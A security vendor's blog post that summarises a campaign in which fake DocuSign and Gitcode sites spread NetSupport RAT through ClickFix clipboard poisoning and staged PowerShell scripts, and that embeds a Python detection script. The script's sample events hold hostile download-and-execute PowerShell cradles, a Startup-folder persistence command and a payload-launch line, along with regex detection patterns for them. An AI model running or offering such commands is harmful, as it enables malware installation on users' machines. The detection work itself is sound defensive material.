Deceptive DocuSign and Gitcode Sites Unleash NetSupport RAT via Multi-Stage PowerShell Attack

Updated: Jun 5

Cybersecurity experts are sounding the alarm on a new campaign utilizing deceptive websites, masquerading as legitimate platforms like DocuSign and Gitcode, to deploy the NetSupport RAT. This sophisticated attack chain leverages multi-stage PowerShell scripts, tricking users into executing malicious code that ultimately compromises their systems.

Deceptive Tactics Unveiled

Threat hunters from DomainTools Investigations (DTI) have uncovered a cunning scheme where malicious PowerShell scripts are hosted on fake Gitcode and DocuSign sites. These sites are designed to lure unsuspecting users into copying and running an initial PowerShell script. This script then downloads further malicious scripts, leading to the eventual installation of the NetSupport RAT.

  • The initial PowerShell script downloads a second downloader script.

  • This second script retrieves additional payloads.

  • Ultimately, the NetSupport RAT is installed on the compromised machine.

The Multi-Stage Attack Flow

The attack unfolds through a series of carefully orchestrated steps:

  1. Initial Lure: Users are directed to counterfeit DocuSign or Gitcode websites, likely via social engineering tactics like email or social media.

  2. Script Execution (Gitcode): On fake Gitcode sites, users are prompted to run a PowerShell script that downloads intermediate scripts from an external server (e.g., "tradingviewtool[.]com"). These scripts sequentially launch the NetSupport RAT.

  3. Clipboard Poisoning (DocuSign): Fake DocuSign sites employ a unique twist. They use ClickFix-style CAPTCHA verifications. Upon attempting to verify, an obfuscated PowerShell command is secretly copied to the user's clipboard. Users are then instructed to paste and execute this command in the Windows Run dialog.

  4. Persistence and Payload Delivery: The executed PowerShell script downloads a persistence script ("wbdims.exe") from GitHub, ensuring the malware launches automatically upon login. This script then communicates with the delivery site, triggering the download of a second-stage PowerShell script. This second script subsequently downloads and executes a third-stage ZIP payload, which contains and runs "jp2launcher.exe," leading to the deployment of NetSupport RAT.
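The four steps above map onto telemetry a defender already collects on Windows endpoints: the Explorer RunMRU list records what a user pasted into the Run dialog (step 3), and PowerShell Script Block Logging (Event ID 4104) records the download cradles, the copy into the Startup folder and the unpacking of the ZIP stage (steps 2 and 4). The script below is an added detection example, not code from DomainTools, The Hacker News or BetterWorld Technology; the events it scores are constructed samples with placeholder URLs, the rule names and the host names are invented, and the threshold is an assumption. It flags a host only when several distinct stages of the chain are seen together, so a lone Invoke-WebRequest that downloads a CSV does not alert.

```python
"""Score endpoint telemetry for the multi-stage PowerShell chain described above.

Added example (not from the original report). Assumed inputs:
  * "ScriptBlock": text of PowerShell Script Block Logging events (ID 4104)
  * "RunMRU":      entries from HKCU\...\Explorer\RunMRU (Win+R history)
Sample events and host names below are constructed for illustration.
"""
import re
from collections import defaultdict

# (rule name, applicable sources, regexes that must ALL match, chain step it maps to)
RULES = [
    ("run_dialog_powershell", {"RunMRU"},
     [r"\b(powershell|pwsh)(\.exe)?\b"],
     "step 3: PowerShell pasted into the Run dialog (clipboard poisoning)"),
    ("hidden_or_bypass_flags", {"RunMRU", "ScriptBlock"},
     [r"-(w(indowstyle)?\s+hidden|nop(rofile)?\b|e(xecutionpolicy|p)?\s+bypass)"],
     "stealthy launch flags typical of a pasted one-liner"),
    ("download_and_execute", {"RunMRU", "ScriptBlock"},
     [r"(invoke-webrequest|\biwr\b|\birm\b|invoke-restmethod|downloadstring|downloadfile)",
      r"(\biex\b|invoke-expression|start-process|\bsaps\b)"],
     "steps 2 and 4: a script that downloads and runs a further script"),
    ("login_persistence", {"ScriptBlock"},
     [r"(\\start menu\\programs\\startup\\|currentversion\\run(once)?\b|register-scheduledtask)"],
     "step 4: persistence so the stage relaunches at login"),
    ("archive_stage_launch", {"ScriptBlock"},
     [r"(expand-archive|extracttodirectory)", r"(start-process|\.exe\b)"],
     "step 4: ZIP payload unpacked and its executable started"),
    ("reported_filename", {"RunMRU", "ScriptBlock"},
     [r"\b(wbdims\.exe|jp2launcher\.exe)\b"],
     "file names named in the report"),
]
COMPILED = [(n, s, [re.compile(p, re.IGNORECASE | re.DOTALL) for p in pats], d)
            for n, s, pats, d in RULES]
DESCRIPTIONS = {n: d for n, _, _, d in RULES}
ALERT_THRESHOLD = 3  # assumption: distinct rules per host before alerting

# Constructed sample telemetry; WS01 mimics the chain, WS02 is ordinary admin activity.
SAMPLE_EVENTS = [
    {"host": "WS01", "source": "RunMRU",
     "text": 'powershell -w hidden -c "iwr https://example.invalid/v.ps1 | iex"'},
    {"host": "WS01", "source": "ScriptBlock",
     "text": "$u='https://example.invalid/stage2.ps1'; "
             "Invoke-Expression (New-Object Net.WebClient).DownloadString($u)"},
    {"host": "WS01", "source": "ScriptBlock",
     "text": 'Copy-Item $env:TEMP\\wbdims.exe '
             '"$env:APPDATA\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\"'},
    {"host": "WS01", "source": "ScriptBlock",
     "text": "Expand-Archive $env:TEMP\\stage3.zip -DestinationPath $env:TEMP\\jp; "
             "Start-Process $env:TEMP\\jp\\jp2launcher.exe"},
    {"host": "WS02", "source": "RunMRU", "text": "notepad"},
    {"host": "WS02", "source": "ScriptBlock",
     "text": "Invoke-WebRequest https://example.invalid/report.csv -OutFile report.csv"},
    {"host": "WS02", "source": "ScriptBlock",
     "text": "Get-ChildItem C:\\Users | Select-Object Name"},
]


def match_rules(event):
    """Return the names of every rule whose patterns all match one event."""
    text = event["text"]
    return [name for name, sources, pats, _ in COMPILED
            if event["source"] in sources and all(p.search(text) for p in pats)]


def score_hosts(events):
    """Collect the distinct rules that fired per host, sorted for stable output."""
    per_host = defaultdict(set)
    for ev in events:
        per_host[ev["host"]].update(match_rules(ev))
    return {host: sorted(rules) for host, rules in per_host.items()}


def alerts(events, threshold=ALERT_THRESHOLD):
    """Hosts reaching the threshold, with the chain stages observed on each."""
    return {host: [DESCRIPTIONS[r] for r in rules]
            for host, rules in score_hosts(events).items()
            if len(rules) >= threshold}


if __name__ == "__main__":
    for host, stages in alerts(SAMPLE_EVENTS).items():
        print(f"ALERT {host}:")
        for stage in stages:
            print(f"  - {stage}")
```

Feed it real data by exporting 4104 message bodies from the Microsoft-Windows-PowerShell/Operational log and the RunMRU values from each user's hive; the per-host grouping is what separates a full chain from the isolated download or Startup-folder write that admin scripts also produce.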

Evasion and Attribution

The multi-stage nature of this attack, involving scripts downloading and executing further scripts, is a deliberate tactic to evade detection and complicate security investigations. While the exact perpetrators remain unknown, DomainTools noted similarities in delivery URLs, domain naming, and registration patterns with a SocGholish (FakeUpdates) campaign from October 2024. It's important to note that NetSupport Manager is a legitimate administrative tool frequently abused by various threat groups, including FIN7, Scarlet Goldfinch, and Storm-0408.

As cyber threats become increasingly sophisticated, your security strategy must evolve to keep pace. BetterWorld Technology offers adaptive cybersecurity solutions that grow with the threat landscape, helping your business stay secure while continuing to innovate. Reach out today to schedule your personalized consultation.

Sources

  • Fake DocuSign, Gitcode Sites Spread NetSupport RAT via Multi-Stage PowerShell Attack, The Hacker News.
